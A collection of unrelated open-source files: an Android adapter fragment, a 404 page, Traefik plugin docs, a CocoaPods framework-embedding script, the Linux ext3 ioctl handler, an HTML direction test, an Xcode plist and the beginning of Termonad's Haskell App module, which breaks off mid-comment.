imageView
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
popupWindow.dismiss();
}
});
popupWindow.showAtLocation(parent,
Gravity.CENTER, 0, 0);
}
});
}
viewHolder.dateTextView.setText(dFormat.format(lookMyPrivate
.getLookDate()));
viewHolder.detailTextView.setText(context
.getString(R.string.try_to_open)
+ " "
+ getLabelBypackageName(lookMyPrivate.getResolver()));
}
}
return convertView;
}
class ViewHolder {
ImageView headerImageView;
TextView dateTextView;
TextView detailTextView;
RelativeLayout ripple;
}
public String getLabelBypackageName(String packageName) {
Log.d("demo3", "packageName:" + packageName);
if (packageManager != null) {
try {
ApplicationInfo info = packageManager.getApplicationInfo(
packageName, PackageManager.GET_UNINSTALLED_PACKAGES);
return (String) packageManager.getApplicationLabel(info);
} catch (NameNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
return "";
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <!-- Allow proper scaling on mobile devices -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>C++ Web Server - 404 - Page Not Found</title>
    <link href="/config/cppwebserverpages/resources/images/favicon.ico" rel="icon" type="image/x-icon">
    <link href="/config/cppwebserverpages/resources/images/favicon.ico" rel="shortcut icon" type="image/x-icon">
    <link href="/config/cppwebserverpages/resources/css/cppweb.css" rel="stylesheet" type="text/css">
</head>
<body>
    <div id="menu">
        <h1>404 - Page Not Found</h1>
        <br class="separator">
        <p class="footer">&copy; 2018 By Herik Lima and Marcelo Eler</p>
    </div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
# Using Plugins
Plugins are available to any instance of Traefik v2.3 or later that is [registered](overview.md#connecting-to-traefik-pilot) with Traefik Pilot.
Plugins are hosted on GitHub, but you can browse plugins to add to your registered Traefik instances from the Traefik Pilot UI.
!!! danger "Experimental Features"
Plugins can potentially modify the behavior of Traefik in unforeseen ways.
Exercise caution when adding new plugins to production Traefik instances.
## Add a Plugin
To add a new plugin to a Traefik instance, you must modify that instance's static configuration.
The code to be added is provided by the Traefik Pilot UI when you choose **Install the Plugin**.
In the example below, we add the [`blockpath`](https://github.com/traefik/plugin-blockpath) and [`rewritebody`](https://github.com/traefik/plugin-rewritebody) plugins:
```toml tab="File (TOML)"
[entryPoints]
[entryPoints.web]
address = ":80"
[pilot]
token = "xxxxxxxxx"
[experimental.plugins]
[experimental.plugins.block]
modulename = "github.com/traefik/plugin-blockpath"
version = "v0.2.0"
[experimental.plugins.rewrite]
modulename = "github.com/traefik/plugin-rewritebody"
version = "v0.3.0"
```
```yaml tab="File (YAML)"
entryPoints:
web:
address: :80
pilot:
token: xxxxxxxxx
experimental:
plugins:
block:
modulename: github.com/traefik/plugin-blockpath
version: v0.2.0
rewrite:
modulename: github.com/traefik/plugin-rewritebody
version: v0.3.0
```
```bash tab="CLI"
--entryPoints.web.address=:80
--pilot.token=xxxxxxxxx
--experimental.plugins.block.modulename=github.com/traefik/plugin-blockpath
--experimental.plugins.block.version=v0.2.0
--experimental.plugins.rewrite.modulename=github.com/traefik/plugin-rewritebody
--experimental.plugins.rewrite.version=v0.3.0
```
## Configuring Plugins
Some plugins will need to be configured by adding a dynamic configuration.
For the `rewritebody` plugin, for example:
```yaml tab="Docker"
labels:
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex=example"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement=test"
```
```yaml tab="Kubernetes"
apiVersion: traefik.containo.us/v1alpha1
kind: Middleware
metadata:
name: my-rewritebody
spec:
plugin:
rewrite:
rewrites:
- regex: example
replacement: test
```
```yaml tab="Consul Catalog"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex=example"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement=test"
```
```json tab="Marathon"
"labels": {
"traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex": "example",
"traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement": "test"
}
```
```yaml tab="Rancher"
labels:
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex=example"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement=test"
```
```toml tab="File (TOML)"
[http.middlewares]
[http.middlewares.my-rewritebody.plugin.rewrite]
lastModified = true
[[http.middlewares.my-rewritebody.plugin.rewrite.rewrites]]
regex = "example"
replacement = "test"
```
```yaml tab="File (YAML)"
http:
middlewares:
my-rewritebody:
plugin:
rewrite:
rewrites:
- regex: example
replacement: test
```
| {
"pile_set_name": "Github"
} |
#!/bin/sh
# CocoaPods "Embed Pods Frameworks" build-phase script preamble.
# Fails fast on any error, ensures the app's Frameworks folder exists,
# and records where the Swift standard libraries live for this platform.
# NOTE(review): the script uses bash features below ([[ ]], PIPESTATUS);
# presumably Xcode invokes it via bash — confirm before changing shebang.
set -e
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
# install_framework <path-or-name>
# Copies one framework from the build products (or an absolute path) into
# the app bundle's Frameworks folder, resolving symlinks, stripping
# simulator-only architectures, re-signing, and (Xcode < 7 only) embedding
# any Swift runtime dylibs the binary links against.
install_framework()
{
  # Resolve the source: prefer the full path under BUILT_PRODUCTS_DIR,
  # then just the basename there, then treat $1 as a literal path.
  if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$1"
  elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
  elif [ -r "$1" ]; then
    local source="$1"
  fi

  local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

  if [ -L "${source}" ]; then
    echo "Symlinked..."
    source="$(readlink "${source}")"
  fi

  # use filter instead of exclude so missing patterns dont' throw errors
  echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
  rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"

  # Locate the framework's main binary (falls back to a bare dylib layout).
  local basename
  basename="$(basename -s .framework "$1")"
  binary="${destination}/${basename}.framework/${basename}"
  if ! [ -r "$binary" ]; then
    binary="${destination}/${basename}"
  fi

  # Strip invalid architectures so "fat" simulator / device frameworks work on device
  if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
    strip_invalid_archs "$binary"
  fi

  # Resign the code if required by the build settings to avoid unstable apps
  code_sign_if_enabled "${destination}/$(basename "$1")"

  # Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
  if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
    local swift_runtime_libs
    swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
    for lib in $swift_runtime_libs; do
      echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
      rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
      code_sign_if_enabled "${destination}/${lib}"
    done
  fi
}
# Signs a framework with the provided identity
# code_sign_if_enabled <path>
# No-op unless the build settings both provide a signing identity and
# allow/require code signing; preserves the existing bundle identifier
# and entitlements while force-re-signing.
code_sign_if_enabled() {
  if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
    # Use the current code_sign_identitiy
    echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
    echo "/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements \"$1\""
    /usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements "$1"
  fi
}
# Strip invalid architectures
# strip_invalid_archs <binary>
# Removes, in place via lipo, every architecture slice that is not listed
# in the target's VALID_ARCHS, so fat simulator+device binaries pass
# App Store validation on device builds.
strip_invalid_archs() {
  binary="$1"
  # Get architectures for current file
  archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
  stripped=""
  for arch in $archs; do
    if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
      # Strip non-valid architectures in-place
      lipo -remove "$arch" -output "$binary" "$binary" || exit 1
      stripped="$stripped $arch"
    fi
  done
  if [[ "$stripped" ]]; then
    echo "Stripped $binary of architectures:$stripped"
  fi
}
| {
"pile_set_name": "Github"
} |
/*
* linux/fs/ext3/ioctl.c
*
* Copyright (C) 1993, 1994, 1995
* Remy Card ([email protected])
* Laboratoire MASI - Institut Blaise Pascal
* Universite Pierre et Marie Curie (Paris VI)
*/
#include <linux/fs.h>
#include <linux/jbd.h>
#include <linux/capability.h>
#include <linux/ext3_fs.h>
#include <linux/ext3_jbd.h>
#include <linux/mount.h>
#include <linux/time.h>
#include <linux/compat.h>
#include <asm/uaccess.h>
/*
 * ext3_ioctl - dispatch ext3-specific ioctl commands.
 *
 * Handles inode-flag get/set, generation (version) get/set, reservation
 * window get/set, and online resize (group extend/add).  State-changing
 * commands take a write reference on the mount (mnt_want_write) and run
 * inside a journal handle.  Returns 0 or a negative errno; -ENOTTY for
 * commands ext3 does not implement.
 */
long ext3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	struct inode *inode = filp->f_dentry->d_inode;
	struct ext3_inode_info *ei = EXT3_I(inode);
	unsigned int flags;
	unsigned short rsv_window_size;

	ext3_debug ("cmd = %u, arg = %lu\n", cmd, arg);

	switch (cmd) {
	case EXT3_IOC_GETFLAGS:
		/* Copy only the user-visible subset of inode flags out. */
		ext3_get_inode_flags(ei);
		flags = ei->i_flags & EXT3_FL_USER_VISIBLE;
		return put_user(flags, (int __user *) arg);
	case EXT3_IOC_SETFLAGS: {
		handle_t *handle = NULL;
		int err;
		struct ext3_iloc iloc;
		unsigned int oldflags;
		unsigned int jflag;

		/* Only the owner (or a capable caller) may change flags. */
		if (!is_owner_or_cap(inode))
			return -EACCES;

		if (get_user(flags, (int __user *) arg))
			return -EFAULT;

		err = mnt_want_write(filp->f_path.mnt);
		if (err)
			return err;

		/* Drop flags that do not apply to this file type. */
		flags = ext3_mask_flags(inode->i_mode, flags);

		mutex_lock(&inode->i_mutex);
		/* Is it quota file? Do not allow user to mess with it */
		err = -EPERM;
		if (IS_NOQUOTA(inode))
			goto flags_out;

		oldflags = ei->i_flags;

		/* The JOURNAL_DATA flag is modifiable only by root */
		jflag = flags & EXT3_JOURNAL_DATA_FL;

		/*
		 * The IMMUTABLE and APPEND_ONLY flags can only be changed by
		 * the relevant capability.
		 *
		 * This test looks nicer. Thanks to Pauline Middelink
		 */
		if ((flags ^ oldflags) & (EXT3_APPEND_FL | EXT3_IMMUTABLE_FL)) {
			if (!capable(CAP_LINUX_IMMUTABLE))
				goto flags_out;
		}

		/*
		 * The JOURNAL_DATA flag can only be changed by
		 * the relevant capability.
		 */
		if ((jflag ^ oldflags) & (EXT3_JOURNAL_DATA_FL)) {
			if (!capable(CAP_SYS_RESOURCE))
				goto flags_out;
		}

		/* Write the new flags under a one-credit journal handle. */
		handle = ext3_journal_start(inode, 1);
		if (IS_ERR(handle)) {
			err = PTR_ERR(handle);
			goto flags_out;
		}
		if (IS_SYNC(inode))
			handle->h_sync = 1;
		err = ext3_reserve_inode_write(handle, inode, &iloc);
		if (err)
			goto flags_err;

		/* Merge user-modifiable bits with the preserved kernel bits. */
		flags = flags & EXT3_FL_USER_MODIFIABLE;
		flags |= oldflags & ~EXT3_FL_USER_MODIFIABLE;
		ei->i_flags = flags;

		ext3_set_inode_flags(inode);
		inode->i_ctime = CURRENT_TIME_SEC;

		err = ext3_mark_iloc_dirty(handle, inode, &iloc);
flags_err:
		ext3_journal_stop(handle);
		if (err)
			goto flags_out;

		/* Switching data journalling mode happens outside the handle. */
		if ((jflag ^ oldflags) & (EXT3_JOURNAL_DATA_FL))
			err = ext3_change_inode_journal_flag(inode, jflag);
flags_out:
		mutex_unlock(&inode->i_mutex);
		mnt_drop_write(filp->f_path.mnt);
		return err;
	}
	case EXT3_IOC_GETVERSION:
	case EXT3_IOC_GETVERSION_OLD:
		return put_user(inode->i_generation, (int __user *) arg);
	case EXT3_IOC_SETVERSION:
	case EXT3_IOC_SETVERSION_OLD: {
		handle_t *handle;
		struct ext3_iloc iloc;
		__u32 generation;
		int err;

		if (!is_owner_or_cap(inode))
			return -EPERM;
		err = mnt_want_write(filp->f_path.mnt);
		if (err)
			return err;
		if (get_user(generation, (int __user *) arg)) {
			err = -EFAULT;
			goto setversion_out;
		}
		handle = ext3_journal_start(inode, 1);
		if (IS_ERR(handle)) {
			err = PTR_ERR(handle);
			goto setversion_out;
		}
		err = ext3_reserve_inode_write(handle, inode, &iloc);
		if (err == 0) {
			inode->i_ctime = CURRENT_TIME_SEC;
			inode->i_generation = generation;
			err = ext3_mark_iloc_dirty(handle, inode, &iloc);
		}
		ext3_journal_stop(handle);
setversion_out:
		mnt_drop_write(filp->f_path.mnt);
		return err;
	}
#ifdef CONFIG_JBD_DEBUG
	case EXT3_IOC_WAIT_FOR_READONLY:
		/*
		 * This is racy - by the time we're woken up and running,
		 * the superblock could be released. And the module could
		 * have been unloaded. So sue me.
		 *
		 * Returns 1 if it slept, else zero.
		 */
		{
			struct super_block *sb = inode->i_sb;
			DECLARE_WAITQUEUE(wait, current);
			int ret = 0;

			set_current_state(TASK_INTERRUPTIBLE);
			add_wait_queue(&EXT3_SB(sb)->ro_wait_queue, &wait);
			if (timer_pending(&EXT3_SB(sb)->turn_ro_timer)) {
				schedule();
				ret = 1;
			}
			remove_wait_queue(&EXT3_SB(sb)->ro_wait_queue, &wait);
			return ret;
		}
#endif
	case EXT3_IOC_GETRSVSZ:
		/* Report the reservation-window goal for regular files. */
		if (test_opt(inode->i_sb, RESERVATION)
			&& S_ISREG(inode->i_mode)
			&& ei->i_block_alloc_info) {
			rsv_window_size = ei->i_block_alloc_info->rsv_window_node.rsv_goal_size;
			return put_user(rsv_window_size, (int __user *)arg);
		}
		return -ENOTTY;
	case EXT3_IOC_SETRSVSZ: {
		int err;

		if (!test_opt(inode->i_sb, RESERVATION) || !S_ISREG(inode->i_mode))
			return -ENOTTY;

		err = mnt_want_write(filp->f_path.mnt);
		if (err)
			return err;

		if (!is_owner_or_cap(inode)) {
			err = -EACCES;
			goto setrsvsz_out;
		}

		if (get_user(rsv_window_size, (int __user *)arg)) {
			err = -EFAULT;
			goto setrsvsz_out;
		}

		/* Clamp the requested window to the filesystem maximum. */
		if (rsv_window_size > EXT3_MAX_RESERVE_BLOCKS)
			rsv_window_size = EXT3_MAX_RESERVE_BLOCKS;

		/*
		 * need to allocate reservation structure for this inode
		 * before set the window size
		 */
		mutex_lock(&ei->truncate_mutex);
		if (!ei->i_block_alloc_info)
			ext3_init_block_alloc_info(inode);
		if (ei->i_block_alloc_info){
			struct ext3_reserve_window_node *rsv = &ei->i_block_alloc_info->rsv_window_node;
			rsv->rsv_goal_size = rsv_window_size;
		}
		mutex_unlock(&ei->truncate_mutex);
setrsvsz_out:
		mnt_drop_write(filp->f_path.mnt);
		return err;
	}
	case EXT3_IOC_GROUP_EXTEND: {
		ext3_fsblk_t n_blocks_count;
		struct super_block *sb = inode->i_sb;
		int err, err2;

		if (!capable(CAP_SYS_RESOURCE))
			return -EPERM;

		err = mnt_want_write(filp->f_path.mnt);
		if (err)
			return err;

		if (get_user(n_blocks_count, (__u32 __user *)arg)) {
			err = -EFAULT;
			goto group_extend_out;
		}
		err = ext3_group_extend(sb, EXT3_SB(sb)->s_es, n_blocks_count);
		/* Flush the journal so the resize is durable before returning. */
		journal_lock_updates(EXT3_SB(sb)->s_journal);
		err2 = journal_flush(EXT3_SB(sb)->s_journal);
		journal_unlock_updates(EXT3_SB(sb)->s_journal);
		if (err == 0)
			err = err2;
group_extend_out:
		mnt_drop_write(filp->f_path.mnt);
		return err;
	}
	case EXT3_IOC_GROUP_ADD: {
		struct ext3_new_group_data input;
		struct super_block *sb = inode->i_sb;
		int err, err2;

		if (!capable(CAP_SYS_RESOURCE))
			return -EPERM;

		err = mnt_want_write(filp->f_path.mnt);
		if (err)
			return err;

		if (copy_from_user(&input, (struct ext3_new_group_input __user *)arg,
				sizeof(input))) {
			err = -EFAULT;
			goto group_add_out;
		}

		err = ext3_group_add(sb, &input);
		/* Flush the journal so the new group is durable before returning. */
		journal_lock_updates(EXT3_SB(sb)->s_journal);
		err2 = journal_flush(EXT3_SB(sb)->s_journal);
		journal_unlock_updates(EXT3_SB(sb)->s_journal);
		if (err == 0)
			err = err2;
group_add_out:
		mnt_drop_write(filp->f_path.mnt);
		return err;
	}
	default:
		return -ENOTTY;
	}
}
#ifdef CONFIG_COMPAT
/*
 * 32-bit compat entry point: translate each EXT3_IOC32_* command number to
 * its native EXT3_IOC_* equivalent, convert the compat pointer argument,
 * and forward to ext3_ioctl().  Commands with identical 32/64-bit layout
 * (EXT3_IOC_GROUP_ADD) pass through unchanged; anything else is rejected
 * with -ENOIOCTLCMD.
 */
long ext3_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	/* These are just misnamed, they actually get/put from/to user an int */
	if (cmd == EXT3_IOC32_GETFLAGS)
		cmd = EXT3_IOC_GETFLAGS;
	else if (cmd == EXT3_IOC32_SETFLAGS)
		cmd = EXT3_IOC_SETFLAGS;
	else if (cmd == EXT3_IOC32_GETVERSION)
		cmd = EXT3_IOC_GETVERSION;
	else if (cmd == EXT3_IOC32_SETVERSION)
		cmd = EXT3_IOC_SETVERSION;
	else if (cmd == EXT3_IOC32_GROUP_EXTEND)
		cmd = EXT3_IOC_GROUP_EXTEND;
	else if (cmd == EXT3_IOC32_GETVERSION_OLD)
		cmd = EXT3_IOC_GETVERSION_OLD;
	else if (cmd == EXT3_IOC32_SETVERSION_OLD)
		cmd = EXT3_IOC_SETVERSION_OLD;
#ifdef CONFIG_JBD_DEBUG
	else if (cmd == EXT3_IOC32_WAIT_FOR_READONLY)
		cmd = EXT3_IOC_WAIT_FOR_READONLY;
#endif
	else if (cmd == EXT3_IOC32_GETRSVSZ)
		cmd = EXT3_IOC_GETRSVSZ;
	else if (cmd == EXT3_IOC32_SETRSVSZ)
		cmd = EXT3_IOC_SETRSVSZ;
	else if (cmd == EXT3_IOC_GROUP_ADD)
		;	/* already the native command number */
	else
		return -ENOIOCTLCMD;
	return ext3_ioctl(file, cmd, (unsigned long) compat_ptr(arg));
}
#endif
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Set and unset dir="auto"</title>
<!-- Test fixture: setDir.js is expected to define setAllDir(), which is
     invoked on load to rewrite the dir attribute of every element whose
     id starts with "set". Each element below mixes RTL (Hebrew) and LTR
     text to exercise direction resolution. Keep markup byte-stable. -->
<script type="text/javascript" src="setDir.js"></script>
<style>
textarea { resize: none; }
</style>
</head>
<body onload="setAllDir('foopy')">
<div><input type="text" value="אבג ABC" id="set0"></div>
<div><span id="set1">אבג ABC</span></div>
<div><textarea id="set2">אבג ABC</textarea></div>
<div><button id="set3">אבג ABC</button></div>
<div><bdi id="set4">אבג ABC</bdi></div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<!-- Xcode per-user scheme state (xcschememanagement.plist): records the
     display order of the AudioQueueRecorder scheme and suppresses
     auto-creation of a scheme for the listed target. Machine-managed;
     edit via Xcode rather than by hand. -->
<plist version="1.0">
<dict>
	<key>SchemeUserState</key>
	<dict>
		<key>AudioQueueRecorder.xcscheme</key>
		<dict>
			<key>orderHint</key>
			<integer>0</integer>
		</dict>
	</dict>
	<key>SuppressBuildableAutocreation</key>
	<dict>
		<key>2B934BA41B90B9A000C55A59</key>
		<dict>
			<key>primary</key>
			<true/>
		</dict>
	</dict>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
{-# LANGUAGE ForeignFunctionInterface #-}
module Termonad.App where
import Termonad.Prelude
import Config.Dyre (defaultParams, projectName, realMain, showError, wrapMain)
import Control.Lens ((.~), (^.), (^..), over, set, view)
import Control.Monad.Fail (fail)
import Data.FocusList (focusList, moveFromToFL, updateFocusFL)
import Data.Sequence (findIndexR)
import GI.Gdk (castTo, managedForeignPtr, screenGetDefault)
import GI.Gio
( ApplicationFlags(ApplicationFlagsFlagsNone)
, MenuModel(MenuModel)
, actionMapAddAction
, applicationQuit
, applicationRun
, onApplicationActivate
, onApplicationStartup
, onSimpleActionActivate
, simpleActionNew
)
import GI.Gtk
( Application
, ApplicationWindow(ApplicationWindow)
, Box(Box)
, CheckButton(CheckButton)
, ComboBoxText(ComboBoxText)
, Dialog(Dialog)
, Entry(Entry)
, FontButton(FontButton)
, Label(Label)
, PolicyType(PolicyTypeAutomatic)
, PositionType(PositionTypeRight)
, ResponseType(ResponseTypeAccept, ResponseTypeNo, ResponseTypeYes)
, ScrolledWindow(ScrolledWindow)
, SpinButton(SpinButton)
, pattern STYLE_PROVIDER_PRIORITY_APPLICATION
, aboutDialogNew
, adjustmentNew
, applicationAddWindow
, applicationGetActiveWindow
, applicationSetAccelsForAction
, applicationSetMenubar
, applicationWindowSetShowMenubar
, boxPackStart
, builderNewFromString
, builderSetApplication
, comboBoxGetActiveId
, comboBoxSetActiveId
, comboBoxTextAppend
, containerAdd
, cssProviderLoadFromData
, cssProviderNew
, dialogAddButton
, dialogGetContentArea
, dialogNew
, dialogResponse
, dialogRun
, entryBufferGetText
, entryBufferSetText
, entryGetText
, entryNew
, fontChooserSetFontDesc
, fontChooserGetFontDesc
, getEntryBuffer
, gridAttachNextTo
, gridNew
, labelNew
, notebookGetNPages
, notebookNew
, notebookSetShowBorder
, onEntryActivate
, onNotebookPageRemoved
, onNotebookPageReordered
, onNotebookSwitchPage
, onWidgetDeleteEvent
, scrolledWindowSetPolicy
, setWidgetMargin
, spinButtonGetValueAsInt
, spinButtonSetAdjustment
, spinButtonSetValue
, styleContextAddProviderForScreen
, toggleButtonGetActive
, toggleButtonSetActive
, widgetDestroy
, widgetGrabFocus
, widgetSetCanFocus
, widgetSetVisible
, widgetShow
, widgetShowAll
, windowPresent
, windowSetDefaultIconFromFile
, windowSetTitle
, windowSetTransientFor
)
import qualified GI.Gtk as Gtk
import GI.Pango
( FontDescription
, pattern SCALE
, fontDescriptionGetFamily
, fontDescriptionGetSize
, fontDescriptionGetSizeIsAbsolute
, fontDescriptionNew
, fontDescriptionSetFamily
, fontDescriptionSetSize
, fontDescriptionSetAbsoluteSize
)
import GI.Vte
( CursorBlinkMode(..)
, catchRegexError
, regexNewForSearch
, terminalCopyClipboard
, terminalPasteClipboard
, terminalSearchFindNext
, terminalSearchFindPrevious
, terminalSearchSetRegex
, terminalSearchSetWrapAround
, terminalSetCursorBlinkMode
, terminalSetFont
, terminalSetScrollbackLines
, terminalSetWordCharExceptions
)
import System.Environment (getExecutablePath)
import System.FilePath (takeFileName)
import Paths_termonad (getDataFileName)
import Termonad.Gtk (appNew, objFromBuildUnsafe)
import Termonad.Keys (handleKeyPress)
import Termonad.Lenses
( lensConfirmExit
, lensCursorBlinkMode
, lensFontConfig
, lensOptions
, lensShowMenu
, lensShowScrollbar
, lensShowTabBar
, lensScrollbackLen
, lensTMNotebook
, lensTMNotebookTabTermContainer
, lensTMNotebookTabs
, lensTMNotebookTabTerm
, lensTMStateApp
, lensTMStateAppWin
, lensTMStateConfig
, lensTMStateFontDesc
, lensTMStateNotebook
, lensTerm
, lensWordCharExceptions
)
import Termonad.PreferencesFile (saveToPreferencesFile)
import Termonad.Term
( createTerm
, relabelTabs
, termExitFocused
, setShowTabs
, showScrollbarToPolicy
)
import Termonad.Types
( FontConfig(..)
, FontSize(FontSizePoints, FontSizeUnits)
, ShowScrollbar(..)
, ShowTabBar(..)
, TMConfig
, TMNotebookTab
, TMState
, TMState'(TMState)
, getFocusedTermFromState
, modFontSize
, newEmptyTMState
, tmNotebookTabTermContainer
, tmNotebookTabs
, tmStateApp
, tmStateNotebook
)
import Termonad.XML (interfaceText, menuText, preferencesText)
-- | Install an application-wide CSS provider on the default GDK screen.
--
-- The CSS gives scrollbars a fixed grey background and makes notebook
-- tabs transparent.  If there is no default screen available this is a
-- no-op.  The commented-out rules are kept as a reference for further
-- scrollbar tweaking.
setupScreenStyle :: IO ()
setupScreenStyle = do
  maybeScreen <- screenGetDefault
  case maybeScreen of
    Nothing -> pure ()
    Just screen -> do
      cssProvider <- cssProviderNew
      let (textLines :: [Text]) =
            [
              "scrollbar {"
            -- , " -GtkRange-slider-width: 200px;"
            -- , " -GtkRange-stepper-size: 200px;"
            -- , " border-width: 200px;"
            , " background-color: #aaaaaa;"
            -- , " color: #ff0000;"
            -- , " min-width: 4px;"
            , "}"
            -- , "scrollbar trough {"
            -- , " -GtkRange-slider-width: 200px;"
            -- , " -GtkRange-stepper-size: 200px;"
            -- , " border-width: 200px;"
            -- , " background-color: #00ff00;"
            -- , " color: #00ff00;"
            -- , " min-width: 50px;"
            -- , "}"
            -- , "scrollbar slider {"
            -- , " -GtkRange-slider-width: 200px;"
            -- , " -GtkRange-stepper-size: 200px;"
            -- , " border-width: 200px;"
            -- , " background-color: #0000ff;"
            -- , " color: #0000ff;"
            -- , " min-width: 50px;"
            -- , "}"
            , "tab {"
            , " background-color: transparent;"
            , "}"
            ]
      let styleData = encodeUtf8 (unlines textLines :: Text)
      cssProviderLoadFromData cssProvider styleData
      styleContextAddProviderForScreen
        screen
        cssProvider
        (fromIntegral STYLE_PROVIDER_PRIORITY_APPLICATION)
-- | Build a Pango 'FontDescription' from the 'FontConfig' stored in a
-- 'TMConfig' (family and size taken from the config's options).
createFontDescFromConfig :: TMConfig -> IO FontDescription
createFontDescFromConfig tmConfig = do
  let fontConf = tmConfig ^. lensOptions . lensFontConfig
  createFontDesc (fontSize fontConf) (fontFamily fontConf)
-- | Build a fresh Pango 'FontDescription' with the given size and
-- font-family name applied.
createFontDesc :: FontSize -> Text -> IO FontDescription
createFontDesc size family = do
  desc <- fontDescriptionNew
  fontDescriptionSetFamily desc family
  setFontDescSize desc size
  pure desc
-- | Apply a 'FontSize' to an existing 'FontDescription'.
--
-- Point sizes are scaled by Pango's 'SCALE' and set as a (relative)
-- size; unit sizes are set as an absolute size.
setFontDescSize :: FontDescription -> FontSize -> IO ()
setFontDescSize fontDesc (FontSizePoints points) =
  fontDescriptionSetSize fontDesc $ fromIntegral (points * fromIntegral SCALE)
setFontDescSize fontDesc (FontSizeUnits units) =
  fontDescriptionSetAbsoluteSize fontDesc $ units * fromIntegral SCALE
-- | Mutate a 'FontDescription' in place by reading its current size,
-- applying the given transformation, and writing the result back.
adjustFontDescSize :: (FontSize -> FontSize) -> FontDescription -> IO ()
adjustFontDescSize f fontDesc = do
  currFontSz <- fontSizeFromFontDescription fontDesc
  let newFontSz = f currFontSz
  setFontDescSize fontDesc newFontSz
-- | Apply a font-size transformation to every open terminal.
--
-- Adjusts the shared 'FontDescription' held in the app state, then
-- pushes the updated description to each VTE terminal in the notebook.
-- Note: reads the state with 'readMVar'; the 'FontDescription' itself is
-- a mutable GObject, so no MVar write is needed.
modifyFontSizeForAllTerms :: (FontSize -> FontSize) -> TMState -> IO ()
modifyFontSizeForAllTerms modFontSizeFunc mvarTMState = do
  tmState <- readMVar mvarTMState
  let fontDesc = tmState ^. lensTMStateFontDesc
  adjustFontDescSize modFontSizeFunc fontDesc
  let terms =
        tmState ^..
          lensTMStateNotebook .
          lensTMNotebookTabs .
          traverse .
          lensTMNotebookTabTerm .
          lensTerm
  foldMap (\vteTerm -> terminalSetFont vteTerm (Just fontDesc)) terms
-- | Read a 'FontSize' back out of a 'FontDescription', undoing Pango's
-- 'SCALE' factor.  An absolute size becomes 'FontSizeUnits'; otherwise
-- the size is rounded to whole points as 'FontSizePoints'.
fontSizeFromFontDescription :: FontDescription -> IO FontSize
fontSizeFromFontDescription fontDesc = do
  currSize <- fontDescriptionGetSize fontDesc
  currAbsolute <- fontDescriptionGetSizeIsAbsolute fontDesc
  return $ if currAbsolute
    then FontSizeUnits $ fromIntegral currSize / fromIntegral SCALE
    else
      let fontRatio :: Double = fromIntegral currSize / fromIntegral SCALE
      in FontSizePoints $ round fontRatio
-- | Convert a 'FontDescription' back into a 'FontConfig'.
-- Returns 'Nothing' when the description has no font family set.
fontConfigFromFontDescription :: FontDescription -> IO (Maybe FontConfig)
fontConfigFromFontDescription fontDescription = do
  fontSize <- fontSizeFromFontDescription fontDescription
  maybeFontFamily <- fontDescriptionGetFamily fontDescription
  return $ (`FontConfig` fontSize) <$> maybeFontFamily
-- | Decide whether a 'ScrolledWindow' is the same underlying GTK widget
-- as a notebook tab's terminal container, by comparing the foreign
-- pointers of their managed GObject wrappers (Haskell-side wrapper
-- values may differ even when they refer to one C object).
